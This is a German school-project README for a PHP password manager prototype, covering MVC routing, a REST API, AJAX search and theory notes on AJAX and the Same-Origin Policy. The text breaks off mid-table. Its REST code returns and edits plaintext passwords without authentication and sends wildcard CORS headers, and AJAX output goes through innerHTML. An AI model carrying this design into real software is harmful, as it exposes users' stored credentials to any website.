# Passwordmanager2.0

# Inhaltsverzeichnis

- [Passwordmanager2.0](#passwordmanager20)
- [Inhaltsverzeichnis](#inhaltsverzeichnis)
- [Problemstellung](#problemstellung)
- [Die Situation](#die-situation)
- [Dein Ziel](#dein-ziel)
- [Deine Zielgruppe](#deine-zielgruppe)
- [Das erwartete Produkt](#das-erwartete-produkt)
- [Mockup](#mockup)
- [Funktionen der REST-Schnittstelle](#funktionen-der-rest-schnittstelle)
- [Lösungsansatz](#lösungsansatz)
  - [Model View Controller (Design Pattern)](#model-view-controller-design-pattern)
  - [Routing](#routing)
  - [Controller](#controller)
  - [Model (Geschäftslogik und DB-Code)](#model-geschäftslogik-und-db-code)
  - [View](#view)
  - [.htaccess](#htaccess)
  - [REST-Schnittstelle](#rest-schnittstelle)
  - [AJAX-Suche](#ajax-suche)
- [Code Implementierung & Erklärung](#code-implementierung--erklärung)
  - [Controller](#controller-1)
  - [render()](#render)
  - [index.php Routing-Layer](#indexphp-routing-layer)
  - [error.php](#errorphp)
  - [Credentials Controller](#credentials-controller)
  - [handleRequest()](#handlerequest)
  - [actionIndex()](#actionindex)
  - [actionView()](#actionview)
  - [actionCreate()](#actioncreate)
  - [api.php](#apiphp)
  - [RESTController](#restcontroller)
  - [Constructor](#constructor)
  - [responseHelper()](#responsehelper)
  - [CredentialsRESTController](#credentialsrestcontroller)
  - [handleGETRequest()](#handlegetrequest)
  - [handlePostRequest()](#handlepostrequest)
  - [handlePutRequest()](#handleputrequest)
- [Testen](#testen)
  - [GET update.php](#get-updatephp)
  - [REST-API](#rest-api)
- [Theorie](#theorie)
- [AJAX](#ajax)
  - [Das XMLHttpRequest-Objekt](#das-xmlhttprequest-objekt)
  - [XMLHttpRequest-Objektmethoden](#xmlhttprequest-objektmethoden)
  - [XMLHttpRequest-Objekteigenschaften](#xmlhttprequest-objekteigenschaften)
  - [onreadystatechange-Eigenschaft](#onreadystatechange-eigenschaft)
  - [Senden von Anfragen an den Server](#senden-von-anfragen-an-den-server)
  - [onload-Eigenschaft](#onload-eigenschaft)
  - [Mehrere Callback-Funktionen](#mehrere-callback-funktionen)
- [Same-Origin-Policy (SOP)](#same-origin-policy-sop)
  - [Warum ist Same-Origin-Policy notwendig?](#warum-ist-same-origin-policy-notwendig)
  - [Wie wird die Same-Origion-Policy umgesetzt?](#wie-wird-die-same-origion-policy-umgesetzt)
- [Cross-Origin-Resource-Sharing CORS](#cross-origin-resource-sharing-cors)
  - [Lockerung der Same-Origin-Policy](#lockerung-der-same-origin-policy)
  - [Schwachstellen, die sich aus CORS-Konfigurationsproblemen ergeben](#schwachstellen-die-sich-aus-cors-konfigurationsproblemen-ergeben)
  - [Vom Server generierter ACAO - Header aus dem vom Client angegebenen Origin-Header](#vom-server-generierter-acao---header-aus-dem-vom-client-angegebenen-origin-header)
- [JSON](#json)
  - [Warum JSON verwenden?](#warum-json-verwenden)
  - [JSON-Syntaxregeln](#json-syntaxregeln)
  - [JSON-Daten – Ein Name und ein Wert](#json-daten--ein-name-und-ein-wert)
  - [JSON - Wird zu JavaScript-Objekten ausgewertet](#json---wird-zu-javascript-objekten-ausgewertet)
  - [JavaScript-Objekte](#javascript-objekte)
- [jQuery](#jquery)
  - [Herunterladen von jQuery](#herunterladen-von-jquery)
  - [jQuery-Syntax](#jquery-syntax)
  - [Document Ready Event](#document-ready-event)
  - [jQuery-Selektoren](#jquery-selektoren)
  - [Der Elementselektor](#der-elementselektor)
  - [Der #id-Selektor](#der-id-selektor)
  - [Der .class-Selektor](#der-class-selektor)
  - [Weitere Beispiele für jQuery-Selektoren](#weitere-beispiele-für-jquery-selektoren)
  - [Was sind Events?](#was-sind-events)
  - [jQuery-Syntax für Eventmethoden](#jquery-syntax-für-eventmethoden)
  - [Häufig verwendete jQuery-Eventmethoden](#häufig-verwendete-jquery-eventmethoden)
- [RESTful Web Services](#restful-web-services)
  - [HTTP-Code](#http-code)
- [Model-View-Controller MVC](#model-view-controller-mvc)
  - [Komponenten](#komponenten)

# Problemstellung 

Deine Rolle
Du bist Webentwickler bei der Firma WebDesign GmbH in Imst. 

# Die Situation 

Der erste von dir entwickelte Prototyp soll jetzt weiterentwickelt und benutzerfreundlicher werden. Für die dafür benötigte REST-Schnittstelle kannst du eine bereits in einem anderen Projekt verwendete Hilfsklasse verwenden, bzw. erweitern. 

# Dein Ziel 

Dein Chef hat dich beauftragt einen verbesserten Prototyp zu erstellen. Dieser soll neben einer asynchronen Suchfunktion die Zugangsdaten auch über eine REST-Schnittstelle darstellungsunabhängig im JSON-Format liefern. Die Schnittstelle soll auch Modifikationen ermöglichen. 

# Deine Zielgruppe 

Die Applikation soll vom Sekretariat und von der Contentbetreuungsabteilung deiner Firma mit einem herkömmlichen Browser oder später über eine App verwendet werden können. 

# Das erwartete Produkt 

Der Prototyp sollte mindestens folgendes umfassen:
-	Umbau des Prototyps anhand des MVC-Musters
-	Suchfunktion (asynchron, ohne Sidereload)
-	REST-Schnittstelle zur Datenabfrage und Modifikation im JSON-Format

# Mockup 

![Mockup](images/mockup.png)

# Funktionen der REST-Schnittstelle 

Einzelne Zugangsdaten auslesen (per ID)
GET http://localhost/php41/api/credentials/14

```json
{
    "id": 14,
    "name": "Agivu",
    "domain": "shareasale.com",
    "cms_username": "jrosed",
    "cms_password": "GvEdUbbA6"
}
``` 

Alle Zugangsdaten auslesen (z.B. sortiert nach Name)
GET http://localhost/php41/api/credentials

```json
[
    {
        "id": 14,
        "name": "Agivu",
        "domain": "shareasale.com",
        "cms_username": "jrosed",
        "cms_password": "GvEdUbbA6"
    },
    {
        "id": 1,
        "name": "Browsecat",
        "domain": "hc360.com",
        "cms_username": "pdeetlefs0",
        "cms_password": "mPaf0XcoXO"
    },
    …
]
``` 

Zugangsdaten suchen (z.B. sortiert nach Name)
GET http://localhost/php41/api/credentials/search/.at

```json
[
    {
        "id": 52,
        "name": "user",
        "domain": "user.at",
        "cms_username": "admind",
        "cms_password": "12345"
    },
    …
]
``` 

Neue Zugangsdaten eintragen
POST http://localhost/php41/api/credentials
Content-Type: application/json
 ```json 
 {"name" : "user", 
 "domain" : "user.at", 
 "cms_username" : "admin", 
 "cms_password": "12345"}
 ``` 

 Zugangsdaten aktualisieren
PUT http://localhost/php41/api/credentials/64
Content-Type: application/json

```json 
{"name" : "user2", 
"domain" : "user.at", 
"cms_username" : "admin", 
"cms_password": "12345"}
``` 

Zugangsdaten löschen

DELETE http://localhost/php41/api/credentials/61
<br><br> 

# Lösungsansatz 

## Model View Controller (Design Pattern) 
<br> 

![Model View Controller](images/modelViewController.png) 

Der Benutzer gibt im Browser eine Adresse ein, welche an den Routing Layer der Webanwendung gesendet wird (In unserem Fall index.php). Dieses Index Script entscheidet welcher Controller für die aktuelle Anfrage zuständig ist. Anschließend holt sich der entsprechende Controller das entsprechende Array an Models aus der Datenbank und übergibt dies an die View. Die View rendert die Daten und sendet die dargestellte HTML-Seite zurück an den Browser. 

## Routing 

Zentraler Einstiegspunkt für alle Benutzerinteraktionen (GUI): index.php 

Entscheidet anhand der Adresse(URL) und HTTP-Methode, welcher Controller für die Verarbeitung der Daten zuständig ist, z.B. http://localhost/passwortmanager/inder.php?r=credentials/update&id=25 

- Zuständiger Controller: Credentials Controller
- Zuständige Viwe: update
- Datensatz: ID:25
- HTTP-Methode GET -> Anzeigen des zu bearbeitenden Datensatzes
- HTTP-Methode POST -> Aktualisieren des zu bearbeitenden Datensatzes

## Controller 

Interagiert mit den Models und überigbt diese an die View. Bereitet die übermittelten Daten der View (Formulardaten, Formularverarbeitung) auf und übergibt diese an die Models zur Weiterverarbeitung (Geschäfts- und Persistenzlogik). 

- Ohne Controller (Passwortmanager 1.0): http://localhost/passwortmanager/view.php?id=25
- Mit Controller (Passwortmanager 2.0): http://localhost/passwortmanager/index.php?r=credentials/view&id=25

## Model (Geschäftslogik und DB-Code)  

Beinhaltet die gesamte **Geschäfts- und Persistenzlogik**. Wird in PHP meist mit dem **Active Record Pattern** aufgebaut. Beinhaltet keine View-Elemente (HTLM-Code, Formularverarbeitung $_POST). 

## View 

Beinhaltet die gesamte **Darstellung** (HTML-Code). In der View sollte sich nur so wenig wie möglich an Logik befinden (z.B. if/else, foreach). Die benötigte View wird vom Controller aufgerufen und dieser übergibt auch die anzuzeigenden Daten. 

## .htaccess 

Mit der .htaccess-Datei kann das Verhalten des Apache-Webservers verändert werden. Das Modul mod_rewrite erlaubt das Umschreiben von URLs. Dies führt zu leichter lesbaren Adressen, was vor allem für die REST-Schnittstelle hilfreich ist. 

- Ohne mod_rewrite: http://localhost/passwortmanager/api.php?r=credentials/64
- Mit mod_rewrite: http:///localhost/passwortmanager/api/credentials/64 

``` 
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule api/(.*)$ api.php?r=$1 [QSA,NC,L]

</IfModule>
``` 

## REST-Schnittstelle 

Die REST-Schnittstelle (REST-API) verwendet einen eigenen Einstiegspunkt **api.php**. Im Gegensatz zur index.php liefert die REST-API alle Daten darstellungsunabhängig im JSON-Format aus, z.B. GET Anfrage: http://localhost/passwortmanager/api/credentials/search/.com 

Antwort: 
```json
[
    {
        "id": 14,
        "name": "Agivu",
        "domain": "shareasale.com",
        "cms_username": "jrosed",
        "cms_password": "GvEdUbbA6"
    },
    {
        "id": 1,
        "name": "Browsecat",
        "domain": "hc360.com",
        "cms_username": "pdeetlefs0",
        "cms_password": "mPaf0XcoXO"
    },
    …
]
``` 

## AJAX-Suche 

Für die asynchrone Suchfunktion wird AJAX verwendet. In unserem Fall greifen wir auf die REST-API zu (dies ist nicht immer zwingend notwendig).

Ablauf:
- JavaScript oder jQuery Click Handler fpr den Such-Button
- Aufruf der REST-Schnittstelle mittels AJAX und HTTP GET
    ```php
    function loadDoc(){
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function(){
            if(this.readState == 4 && this.status == 200){
                document.getElementById("demo").innerHTML = this.responseText;
            }
        };
        xhttp.open("GET","ajax_info.txt", true);
        xhttp.send();
    }
- Verarbeitung und Darstellung der JSON Daten mit JavaScript
<br><br>

# Code Implementierung & Erklärung 

## Controller 

## render()

Die Methode **render()** stellt unser Website-Layout dar. Der erste Parameter $view ist die zu ladende View und der zweite Parameter $model sind die Daten, welche in der View dargestellt werden sollen.  
```php
<?php

abstract class Controller
{
    public function render($view, $model = null){

        include 'views/layouts/top.php';
        include 'views/'.$view.'.php';
        include 'views/layouts/bottom.php';
    }

    protected function redirect($location){

        header('Location: index.php?=r'.$location);
    }

    public static function showError($title, $message, $status){

        http_response_code($status);
        include 'views/error.php';
    }

    /**
     * Helper method for extraction POST data
     * @param $field
     * @return mixed|null
     */
    protected function getDataOrNull($field){
        return isset($_POST[$field]) ? $_POST[$field] : null;
    }
}
``` 

## index.php Routing-Layer 

Entscheidet wie die Adresse welche der Benutzer in den Browser eingibt verarbeitet wird. 

Es wird eine route Variable erstellt und über $_GET der r Parameter geholt (Bei http://localhost/passwortmanager/index.php?r=credentials/update wäre es credentials/update). 

Mit der **explode** Methode wird das ganze auseinandergebrochen, z.B. bei index.php?r=credentials/update&id=25 einen vorderen Teil credentials, welcher Controller ist und einen zweiten Teil update welcher die View bzw. die zu verwendende Methode **action** darstellt.  

Mit **trim** werden Leerzeichen entfernt. 

Der Controller ist das erste Element in unserem Array und es wird geprüft ob es mehr als null Elemente beinhaltet, wenn dies der Fall ist wird das Element 0 aus dem Array herausgeholt. Ansonsten wird der default Wert credentials verwendet.

```php
<?php

require_once('controllers/Controller.php');

$route = isset($_GET['r']) ? explode('/', trim($_GET['r'],'/')) : ['credentials'];
$controller = sizeof($route) > 0 ? $route[0] : 'credentials';

if ($controller == 'credentials'){

    require_once ('controllers/CredentialsController.php');
    (new CredentialsController())->handleRequest($route);

} else {
    Controller::showError("Page not found", "Page for operation".$controller." was not found!", 404);
}
``` 

## error.php

Es wird ein Standarttext verwendet, welcher im Fehlerfall angezeigt wird. 

```php
<body>
<h1><?= htmlentities($title) ?></h1>
<p>
    <?= htmlentities($message) ?>
</p>
</body>
```

## Credentials Controller

## handleRequest() 

Die **handleRequest()** Mehtode entscheidet welche View angezeigt wird. 

Aus der Route muss das zweite Element ausgelesen werden und die jeweilige Methode **action** aufgerufen werden. 
Dies geschieht durch die Prüfung ob die route größer 1 ist, dann wird das erste Element verwendet und dies ist in diesem Fall standarmäßig die index View. 

```php
require_once ('Controller.php');
require_once ('models/Credentials.php');

class CredentialsController extends Controller
{
    public function handleRequest($route){

        $operation = sizeof($route) > 1 ? $route[1] : 'index';
        $id = isset($_GET['id']) ? $_GET['id'] : 0;

        if ($operation == 'index'){
            $this->actionIndex();
        } elseif ($operation == 'view'){
            $this->actionView($id);
        } elseif ($operation == 'create'){
            $this->actionCreate();
        } elseif ($operation == 'update'){
            $this->actionUpdate($id);
        } elseif ($operation == 'delete'){
            $this->actionDelete($id);
        } else {
            Controller::showError("Page not found", "Page for controller ".$operation." was not found!", 404);
        }
    }
``` 

## actionIndex() 

Die **actionIndex()** Methode läd alle Daten aus der Datenbank mit Hilfe der statischen Methode **getAll()** aus der Credentials Klasse.

```php
public function actionIndex(){

        $model = Credentials::getAll();
        $this->render('credentials/index', $model);
    }
``` 

## actionView() 

Bei der **actionView()** wird ein einzelner Datensatz geladen und anschließend die View für die Darstellung eines Datensatzes aufgerufen. 

```php
public function actionView($id){

        $model = Credentials::get($id);

        if ($model == null) {
            Controller::showError("Page not found", "Data not found", 404);
        } else {
            $this->render('credentials/view', $model);
        }
    }
``` 

## actionCreate() 

Diese Methode hat eine Besonderheit, denn sie wird zweimal aufgerufen. Das erste Mal beim anzeigen des Formulars, damit der Benuzter die Daten eintragen kann und anschließend wenn er das Formular abschickt, wird die Methode nochmals mit HTTP-POST aufgerufen. 

```php
public function actionCreate(){

        $model = new Credentials();

        if(!empty($_POST)){
            $model->setName($this->getDataOrNull('name'));
            $model->setDomain($this->getDataOrNull('domain'));
            $model->setCmsUsername($this->getDataOrNull('cms_username'));
            $model->setCmsPassword($this->getDataOrNull('cms_password'));

            if($model->save()){
                $this->redirect('credentials/index');
                return;
            }
        }

        $this->render('credentials/create', $model);
    }
``` 

## api.php 

Dies ist das Einstiegsscript für die REST-Schnittstelle. Es ist gleich aufgebaut wie index.php, mit dem Unterschied, dass ein REST-Controller verwendet wird.

```php
require_once('controllers/RESTController.php');

// entry point for the rest api
// e.g. GET http://localhost/php41/api.php?r=credentials/25
// or with url_rewrite GET http://localhost/php41/api/credentials/25
// select route: credentials/25 -> controller=credentials, action=GET, id=25
$route = isset($_GET['r']) ? explode('/', trim($_GET['r'], '/')) : ['credentials'];
$controller = sizeof($route) > 0 ? $route[0] : 'credentials';

if ($controller == 'credentials') {
    require_once('controllers/CredentialsRESTController.php');

    try {
        (new CredentialsRESTController())->handleRequest();
    } catch(Exception $e) {
        RESTController::responseHelper($e->getMessage(), $e->getCode());
    }
} else {
    RESTController::responseHelper('REST-Controller "' . $controller . '" not found', '404');
}
``` 

## RESTController

Diese abstrkte Klasse beinhaltet Datenfelder für die HTTP-Methode, den Endpoint (credentials), das Verb (zusätzliche Wort in der Adresse) und einzelne Argumente (id). 
Im File datenfeld $file befindet sich der Inhalt einer POST oder PUT Anfrage, sprich Daten welche über die REST-Schnittstelle gesendet werden. 

## Constructor 

Im Constructor werden die verschiedenen GET-Parameter extrahiert und falls vorhanden, die POST- und PUT-Parameter. 

Im SWITCH-Statement werden bei POST und PUT die Inhalte ausgelesen, decodiert und in file abgespeichert. 

```php
public function __construct()
    {
        header("Access-Control-Allow-Origin: *");
        header("Access-Control-Allow-Methods: *");
        header("Content-Type: application/json");

        $this->args = isset($_GET['r']) ? explode('/', trim($_GET['r'], '/')) : [];
        if (sizeof($this->args) == 0) {
            throw new Exception('Bad Request', 400);
        }

        $this->endpoint = array_shift($this->args);
        if (array_key_exists(0, $this->args) && !is_numeric($this->args[0])) {
            $this->verb = array_shift($this->args);
        }

        $this->method = $_SERVER['REQUEST_METHOD'];
        if ($this->method == 'POST' && array_key_exists('HTTP_X_HTTP_METHOD', $_SERVER)) {
            if ($_SERVER['HTTP_X_HTTP_METHOD'] == 'DELETE') {
                $this->method = 'DELETE';
            } else if ($_SERVER['HTTP_X_HTTP_METHOD'] == 'PUT') {
                $this->method = 'PUT';
            } else {
                throw new Exception('Method Not Allowed', 405);
            }
        }

        switch ($this->method) {
            case 'DELETE':
            case 'POST':
                $this->request = $this->cleanInputs($_POST);
                $this->file = json_decode(file_get_contents("php://input"), true);
                break;
            case 'GET':
                $this->request = $this->cleanInputs($_GET);
                break;
            case 'PUT':
                $this->request = $this->cleanInputs($_GET);
                $this->file = json_decode(file_get_contents("php://input"), true);
                //$this->file = file_get_contents("php://input");
                break;
            default:
                throw new Exception('Method Not Allowed', 405);
        }
    }
``` 

## responseHelper() 

Mit dieser Methode werden Daten Json-Codiert zurückgsendet und im Header die HTTP-Statusmeldung zurückgegeben. 

```php
public static function responseHelper($data, $status) {
        header("HTTP/1.1 " . $status . " " . RESTController::requestStatus($status));
        echo json_encode($data);
    }
``` 

Statusmeldungen 

```php
private static function requestStatus($code)
    {
        $status = array(
            200 => 'OK',
            201 => 'Created',
            400 => 'Bad Request',
            404 => 'Not Found',
            405 => 'Method Not Allowed',
            500 => 'Internal Server Error',
        );
        return key_exists($code, $status) ? $status[$code] : $status[500];
    }
``` 

## CredentialsRESTController 

Der Unterschied zum Controller für die View ist, dass die Daten im JSON-Format übertragen werden. 

```php
require_once('RESTController.php');
require_once('models/Credentials.php');

class CredentialsRESTController extends RESTController
{

    public function handleRequest()
    {
        switch ($this->method) {
            case 'GET':
                $this->handleGETRequest();
                break;
            case 'POST':
                $this->handlePOSTRequest();
                break;
            case 'PUT':
                $this->handlePUTRequest();
                break;
            case 'DELETE':
                $this->handleDELETERequest();
                break;
            default:
                $this->response('Method Not Allowed', 405);
                break;
        }
    }
``` 

## handleGETRequest() 

Diese Methode wird aufgerufen wenn eine Liste einzelner Datensätze geladen werden soll. 
Mit **response** werden die Daten decodiert.

```php
private function handleGETRequest()
    {
        if ($this->verb == null && sizeof($this->args) == 0) {
            $model = Credentials::getAll();
            $this->response($model);
        } else if ($this->verb == null && sizeof($this->args) == 1) {
            $model = Credentials::get($this->args[0]);
            if ($model == null) {
                $this->response("Not found", 404);
            } else {
                $this->response($model);
            }
        } else if ($this->verb == 'search' && sizeof($this->args) == 1) {
            $model = Credentials::getAll($this->args[0]);
            $this->response($model);
        } else {
            $this->response("Bad request", 400);
        }
    }
``` 

## handlePostRequest() 

Diese Methode wird aufgerufen wenn ein neuer Datensatz erstellt werden soll. 

```php
private function handlePOSTRequest()
    {
        $model = new Credentials();
        $model->setName($this->getDataOrNull('name'));
        $model->setDomain($this->getDataOrNull('domain'));
        $model->setCmsUsername($this->getDataOrNull('cms_username'));
        $model->setCmsPassword($this->getDataOrNull('cms_password'));

        if ($model->save()) {
            $this->response("Created", 201);
        } else {
            $this->response($model->getErrors(), 400);
        }
    }
``` 

## handlePutRequest() 

Diese Methode wird aufgerufen wenn ein Datensatz bearbeite werden soll. 
Es wird geprüft ob das verb leer ist und die Anzahl an Argumenten 1 ist (update credentials: PUT api.php?r=credentials/25 -> args[0] = 25).

```php
private function handlePUTRequest()
    {
        if ($this->verb == null && sizeof($this->args) == 1) {

            $model = Credentials::get($this->args[0]);

            if ($model == null) {
                $this->response("Not found", 404);
            } else {
                $model->setName($this->getDataOrNull('name'));
                $model->setDomain($this->getDataOrNull('domain'));
                $model->setCmsUsername($this->getDataOrNull('cms_username'));
                $model->setCmsPassword($this->getDataOrNull('cms_password'));

                if ($model->save()) {
                    $this->response("OK");
                } else {
                    $this->response($model->getErrors(), 400);
                }
            }

        } else {
            $this->response("Not Found", 404);
        }
    }
``` 

# Testen 

## GET update.php 
<br>

![Zugangsdaten-Bearbeiten](images/zugangsdatenBearbeiten.png) 

Wird eine falsche ID angegeben folgt **Page not found** 

![updateFail](images/updateFail.png) 

Datensatz bearbeitet 

![update](images/update.png) 
<br>

## REST-API 

Test der POST-Methode

![API-POST](images/apiPost.png)

![API-POST-FAIL](images/apiPostFail.png) 

Test der GET-Methode

![API-GET](images/apiGET.png)

Mit Suche

![API-SEARCH](images/apiSearch.png) 
<br> 

# Theorie 

# AJAX 

AJAX (Asynchronous JavaScript And XML) ist der Traum eines jeden Entwicklers, denn Sie können:

- Daten von einem Webserver lesen - nachdem die Seite geladen wurde
- Aktualisieren Sie eine Webseite, ohne die Seite neu zu laden
- Senden Sie Daten an einen Webserver - im Hintergrund 
<br>

![Ajax-Einführung](images/ajax.png)

1. Ein Ereignis tritt auf einer Webseite auf (die Seite wird geladen, eine Schaltfläche wird angeklickt)
2. Ein XMLHttpRequest-Objekt wird von JavaScript erstellt
3. Das XMLHttpRequest-Objekt sendet eine Anfrage an einen Webserver
4. Der Server verarbeitet die Anfrage
5. Der Server sendet eine Antwort zurück an die Webseite
6. Die Antwort wird von JavaScript gelesen
7. Die richtige Aktion (wie Seitenaktualisierung) wird von JavaScript durchgeführt 


## Das XMLHttpRequest-Objekt 

Alle modernen Browser unterstützen das XMLHttpRequestObjekt.

Über das XMLHttpRequestObjekt können hinter den Kulissen Daten mit einem Webserver ausgetauscht werden. Das bedeutet, dass es möglich ist, Teile einer Webseite zu aktualisieren, ohne die ganze Seite neu zu laden. 

Erstellen eines XMLHttpRequest-Objekt 

```php
variable = new XMLHttpRequest();
``` 

Eine **Callback-Funktion** ist eine Funktion, die als Parameter an eine andere Funktion übergeben wird.

In diesem Fall sollte die Rückruffunktion den auszuführenden Code enthalten, wenn die Antwort bereit ist.

```php
xhttp.onload = function() {
  // What to do when the response is ready
}
``` 

Um eine Anfrage an einen Server zu senden, können Sie die Methoden open() und send() des XMLHttpRequestObjekts verwenden:

```php
xhttp.open("GET", "ajax_info.txt");
xhttp.send();
``` 

## XMLHttpRequest-Objektmethoden 

<table>
<tr>
    <th>Methode</th>
    <th>Beschreibung</th>
</tr>
<tr>
    <td>new XMLHttpRequest()</td>
    <td>Erstellt ein neues XMLHttpRequest Objekt</td>
</tr>
<tr>
    <td>abort()</td>
    <td>Bricht den aktuellen Request ab</td>
</tr>
<tr>
    <td>getAllResponseHeaders()</td>
    <td>Gibt Header Informationen zurück</td>
</tr>
<tr>
    <td>getResponseHeader()</td>
    <td>Gibt spezifische Header Informationen zurück</td>
</tr>
<tr>
    <td>open(method, url, async, user, psw)</td>
    <td>Spezifiziert den Request
        <ul> 
         <li>method: Request type GET oder POST</li>
         <li>url: file location</li>
         <li>async: true (asynchronous) oder false (synchronoous)</li>
        <li>user: optional user name</li>
        <li> psw: optional password</li>
        </ul>    
    </td>
</tr>
<tr>
    <td>send()</td>
    <td>Sendet den Request an den Server. Wird für GET Request verwendet.</td>
</tr>
<tr>
    <td>send(string)</td>
    <td>Sendet den Request an den Server. Wird für POST Request verwendet.</td>
</tr>
<tr>
    <td>setRequestHeader()</td>
    <td>Fügt dem zu sendenden Header ein Label/Wert-Paar hinzu</td>
</tr>
</table>
<br>

## XMLHttpRequest-Objekteigenschaften 

<table>
<tr>
    <th>Eigenschaften</th>
    <th>Beschreibung</th>
</tr>
<tr>
    <td>onload</td>
    <td>Definiert eine Funktion, die aufgerufen wird, wenn die Anfrage empfangen (geladen) wird</td>
</tr>
<tr>
    <td>onreadystatechange</td>
    <td>Definiert eine Funktion, die aufgerufen wird, wenn sich die readyState-Eigenschaft ändert</td>
</tr>
<tr>
    <td>readyState</td>
    <td>	Enthält den Status der XMLHttpRequest.
        <ul>
        <li>0: Anfrage nicht initialisiert</li>
        <li>1: Serververbindung hergestellt</li>
        <li>2: Anfrage empfangen</li>
        <li>3: Anfrage wird bearbeitet</li>
        <li>4: Anfrage beendet und Antwort ist bereit</li>
        </ul>
    </td>
</tr>
<tr>
    <td>responseText</td>
    <td>Gibt die Antwortdaten als String zurück</td>
</tr>    
<tr>
    <td>responseXML</td>
    <td>Gibt die Antwortdaten als XML-Daten zurück</td>
</tr>
<tr>
    <td>status</td>
    <td>
        <ul>
        <li>Gibt die Statusnummer einer Anfrage zurück</li>
        <li>200: "OK"</li>
        <li>403: "Verboten"</li>
        <li>404: "Nicht gefunden"</li>
        </ul>
    </td>
</tr>
<tr>
    <td>statusText</td>
    <td>Gibt den Status-Text zurück (z.B. "OK" oder "Nicht gefunden")</td>
</tr>
</table> 
<br>

## onreadystatechange-Eigenschaft 
<br>

Die **readyStateEigenschaft** enthält den Status der XMLHttpRequest.

Die **onreadystatechangeEigenschaft** definiert eine Callback-Funktion, die ausgeführt werden soll, wenn sich der readyState ändert.

Die **statusEigenschaft** und die **statusTextEigenschaften** enthalten den Status des XMLHttpRequest-Objekts.

<table>
<tr>
    <th>Eigenschaften</th>
    <th>Beschreibung</th>
</tr>
<tr>
    <td>onreadystatechange</td>
    <td>Definiert eine Funktion, die aufgerufen wird, wenn sich die readyState-Eigenschaft ändert</td>
</tr>
<tr>
    <td>readyState</td>
    <td>Enthält den Status der XMLHttpRequest.
    <ul>
    <li>0: request not initialized</li>
    <li>1: server connection established</li>
    <li>2: request received</li>
    <li>3: processing request</li>
    <li>4: request finished and response is ready</li>
    </ul>
</tr>
<tr>
    <td>status</td>
    <td>
    <ul>
    <li>200: "OK"</li>
    <li>403: "Forbidden"</li>
    <li>404: "Page not found"</li>
    </ul>
</tr>
<tr>
    <td>statusText</td>
    <td>Gibt den Status-Text zurück (z.B. "OK" oder "Not Found")</td>
</tr>
</table>
<br>

Die **onreadystatechangeFunktion** wird jedes Mal aufgerufen, wenn sich der readyState ändert.

Wenn **readyState4** und der Status 200 ist, ist die Antwort bereit:

```php
function loadDoc() {
  const xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML =
      this.responseText;
    }
  };
  xhttp.open("GET", "ajax_info.txt");
  xhttp.send();
}
``` 
<br>

## Senden von Anfragen an den Server 
<br>

Um eine Anfrage an einen Server zu senden, verwenden wir die Methoden open() und send() des XMLHttpRequestObjekts:

```php
xhttp.open("GET", "ajax_info.txt", true);
xhttp.send();
``` 

<table>
<tr>
    <th>Methode</th>
    <th>Beschreibung</th>
</tr>
<tr>
    <td>open(method, url, async)</td>
    <td>Gibt die Art der Anfrage an.
         <ul>
         <li>Methode: die Art der Anfrage: GET oder POST</li>
         <li>url: der Speicherort des Servers (der Datei)</li>
          <li>async: wahr (asynchron) oder falsch (synchron)</li> 
         </ul>
    </td>
</tr>
<tr>
    <td>send()</td>
    <td>Sendet die Anfrage an den Server (verwendet für GET)</td>
</tr>
<tr>
    <td>send(string)</td>
    <td>Sendet die Anfrage an den Server (verwendet für POST)</td>
</tr>
</table>

Der URL-Parameter der open()Methode ist eine Adresse zu einer Datei auf einem Server: 

```php 
xhttp.open("GET", "ajax_test.asp", true);
``` 
Bei der Datei kann es sich um jede Art von Datei handeln, z. B. .txt und .xml, oder um Serverskriptdateien wie .asp und .php (die Aktionen auf dem Server ausführen können, bevor die Antwort zurückgesendet wird). 

Serveranfragen sollten asynchron gesendet werden.

Der async-Parameter der open()-Methode sollte auf true gesetzt werden:

```php
xhttp.open("GET", "ajax_test.asp", true);
``` 

Durch das asynchrone Senden muss das JavaScript nicht auf die Serverantwort warten, sondern kann stattdessen:

- andere Skripte ausführen, während auf die Antwort des Servers gewartet wird
- Behandeln Sie die Antwort, nachdem die Antwort fertig ist


Der Standardwert für den async-Parameter ist async = true.

Sie können den dritten Parameter sicher aus Ihrem Code entfernen.

Synchrone XMLHttpRequest (async = false) wird nicht empfohlen, da das JavaScript die Ausführung anhält, bis die Serverantwort bereit ist. Wenn der Server ausgelastet oder langsam ist, bleibt die Anwendung hängen oder stoppt.
<br>

## onload-Eigenschaft 
<br>

Mit dem **XMLHttpRequest** Objekt können Sie eine Callback-Funktion definieren, die ausgeführt wird, wenn die Anfrage eine Antwort erhält.

Die Funktion wird in der **onloadEigenschaft** des **XMLHttpRequestObjekts** definiert: 

```php
xhttp.onload = function() {
  document.getElementById("demo").innerHTML = this.responseText;
}
xhttp.open("GET", "ajax_info.txt");
xhttp.send();
```
<br>

## Mehrere Callback-Funktionen 
<br>

Wenn Sie mehr als eine AJAX-Aufgabe in einer Website haben, sollten Sie eine Funktion zum Ausführen des **XMLHttpRequestObjekts** und eine Callback-Funktion für jede AJAX-Aufgabe erstellen.

Der Funktionsaufruf sollte die URL enthalten und welche Funktion aufgerufen werden soll, wenn die Antwort bereit ist. 

```php
loadDoc("url-1", myFunction1);

loadDoc("url-2", myFunction2);

function loadDoc(url, cFunction) {
  const xhttp = new XMLHttpRequest();
  xhttp.onload = function() {cFunction(this);}
  xhttp.open("GET", url);
  xhttp.send();
}

function myFunction1(xhttp) {
  // action goes here
}
function myFunction2(xhttp) {
  // action goes here
}
```
<br> 

# Same-Origin-Policy (SOP) 
<br>

Die Same-Origin-Richtlinie ist ein Sicherheitsmechanismus für Webbrowser, der verhindern soll, dass Websites sich gegenseitig angreifen.

Die Richtlinie für denselben Ursprung verhindert, dass Skripts auf einem Ursprung auf Daten von einem anderen Ursprung zugreifen. Ein Ursprung besteht aus einem URI-Schema, einer Domäne und einer Portnummer. Betrachten Sie beispielsweise die folgende URL: 

```
http://normal-website.com/example/example.html
``` 
<br>

Dabei werden das Schema **http**, die Domäne **normal-website.com** und die Portnummer **80** verwendet. Die folgende Tabelle zeigt, wie die Same-Origin-Richtlinie angewendet wird, wenn Inhalte unter der obigen URL versuchen, auf andere Ursprünge zuzugreifen: 

<table>
    <tr>
        <th>URL aufgerufen</th>
        <th>Zugriff erlaubt?</th>
    </tr>
    <tr>
